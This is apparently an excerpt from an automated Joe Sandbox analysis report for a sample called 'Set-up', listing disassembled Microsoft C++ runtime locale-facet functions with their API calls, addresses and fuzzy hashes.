                                                                                              Function 6BC2A9F5 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A9FC
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA06
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA1D
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2AA26
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • numpunct.LIBCPMT ref: 6BC2AA40
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA54
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2AA63
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA73
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2AA79
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrownumpunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1601970360-3145022300
                                                                                              • Opcode ID: 69a5356a9c9dd54933178127335dbf2ad4d56ae112de8ce0c2f166d814d4bc78
                                                                                              • Instruction ID: b024d0d1a3a334ac8665127ff07257dfb82b10d78e17f3318bb5d516f229b5ae
                                                                                              • Opcode Fuzzy Hash: 69a5356a9c9dd54933178127335dbf2ad4d56ae112de8ce0c2f166d814d4bc78
                                                                                              • Instruction Fuzzy Hash: 9D0180319216299BCF05DFB0C952AAE7335BF85724F500569E121BB2E0FB3C9B05DB61
                                                                                              Function 6BC3C9A9 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3C9B0
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C9BA
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C9D1
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3C9DA
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3C9F4
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3CA08
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CA17
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CA27
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CA2D
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CA3A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 71a86e8d598dc32a379fa921f7e6825aff46587a91508762afb02b29b94a4c75
                                                                                              • Instruction ID: bef2053aafc442c542b3851b6183584e935ec4c96a9ae44d0a787ae48dbceed7
                                                                                              • Opcode Fuzzy Hash: 71a86e8d598dc32a379fa921f7e6825aff46587a91508762afb02b29b94a4c75
                                                                                              • Instruction Fuzzy Hash: FB01A13292163997CF01DBB0C852AAEB735AF81724F940128E020BB290FB3C9B01DB61
                                                                                              Function 6BC2A952 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A959
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A963
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A97A
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2A983
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • numpunct.LIBCPMT ref: 6BC2A99D
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9B1
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2A9C0
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9D0
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2A9D6
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrownumpunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1601970360-3145022300
                                                                                              • Opcode ID: efe1689ba148f53c27f78aa7c9ae46b12fa2990ecbe4076369b526f045cebb34
                                                                                              • Instruction ID: d07da2cf97180cbbb85c838fc6b1e9f156a0105076643b8f000ca32f720e2407
                                                                                              • Opcode Fuzzy Hash: efe1689ba148f53c27f78aa7c9ae46b12fa2990ecbe4076369b526f045cebb34
                                                                                              • Instruction Fuzzy Hash: 7C01AD319216299BCF05EBB0C856AAE73316F81724F510569E120BB2D0FB3C9B01DB61
                                                                                              Function 6BC3C906 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3C90D
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C917
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C92E
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3C937
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3C951
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3C965
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3C974
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C984
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3C98A
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EB32,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C997
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: f81fc50a29084819e78a6898e8b9b96291766f0439ba29a9b5f960a365559c31
                                                                                              • Instruction ID: cb522b0301fcd3f529a9cc21b868115e70ed9e94393d11992ea9f8a5fabe492e
                                                                                              • Opcode Fuzzy Hash: f81fc50a29084819e78a6898e8b9b96291766f0439ba29a9b5f960a365559c31
                                                                                              • Instruction Fuzzy Hash: C0018E3192173997CF05DBB4C862AAE7335AF85724F950128E130AB290FB3C9B01DB61
                                                                                              Function 6BC2A8AF Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • numpunct.LIBCPMT ref: 6BC2A8FA
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A90E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2A91D
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A92D
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2A933
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrownumpunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1601970360-3145022300
                                                                                              • Opcode ID: 237af1ad84e6a536c97c60ce873a986025f49ad27020e0c4184fa44696f70f6c
                                                                                              • Instruction ID: 9737816cd0876cd8dbabc6b8dbe1ea77d1b433cda7e7e96efaa91f7a3cbf8948
                                                                                              • Opcode Fuzzy Hash: 237af1ad84e6a536c97c60ce873a986025f49ad27020e0c4184fa44696f70f6c
                                                                                              • Instruction Fuzzy Hash: 1001C4319216199BCF01DBB0C852AAEB735BF85724F540568E030BB2E0FB3C9B01DB61
                                                                                              Function 6BC3C863 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3C86A
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C874
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C88B
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3C894
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT ref: 6BC3C8AE
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3C8C2
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3C8D1
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C8E1
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3C8E7
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EAC5,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3C8F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              • Opcode ID: 50afab8db102bf949d692691e50f69ff74218ac61bc459a22859859395628473
                                                                                              • Instruction ID: 8aaa20fe809d91aca80f41da1ecd50ba676ba83a0c15255c770d01fc494a4da8
                                                                                              • Opcode Fuzzy Hash: 50afab8db102bf949d692691e50f69ff74218ac61bc459a22859859395628473
                                                                                              • Instruction Fuzzy Hash: E201A53192063997CF01DF74C8529AE73317F80728F940525D021BB290FB3C9B05D761
                                                                                              Function 6BC21860 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC21867
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC21871
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC21888
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC21891
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT(?,?,00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC218AB
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC218BF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC218CE
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC218DE
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC218E4
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC39604,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC218F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              • Opcode ID: 55918a9aff4df78fb0d36d299d38b47eca2f4447bb548cdd4b71eb2b2b00a1c1
                                                                                              • Instruction ID: 35f92bdb5383c27924c97e296c8a19ea0835e4de9f244a2247f8155d377c6eae
                                                                                              • Opcode Fuzzy Hash: 55918a9aff4df78fb0d36d299d38b47eca2f4447bb548cdd4b71eb2b2b00a1c1
                                                                                              • Instruction Fuzzy Hash: 3801A1329206299BCF01DBB4C852AAE7331BF80724F550128E0207B2D0FB3D9B01DB61
                                                                                              Function 6BC4182F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC41836
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41840
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41857
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC41860
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • collate.LIBCPMT ref: 6BC4187A
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC4188E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC4189D
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC418AD
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC418B3
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41952,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC418C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcollatestd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1009662711-3145022300
                                                                                              • Opcode ID: f4aeeededc3039a131754d61c07fb4fd5baba219a384965ac3687f314fec791a
                                                                                              • Instruction ID: 83100cd6c29647d87660df27ce3fb278a044365de9ae2bcb6a41520cdd533da3
                                                                                              • Opcode Fuzzy Hash: f4aeeededc3039a131754d61c07fb4fd5baba219a384965ac3687f314fec791a
                                                                                              • Instruction Fuzzy Hash: EC01C071D206299BCF01DBB4C852AADB735AF80724F550228E160BB2E0FB3C9B01DB61
                                                                                              Function 6BC25FA8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25FAF
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC25FB9
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC39531,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC25FD0
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC25FD9
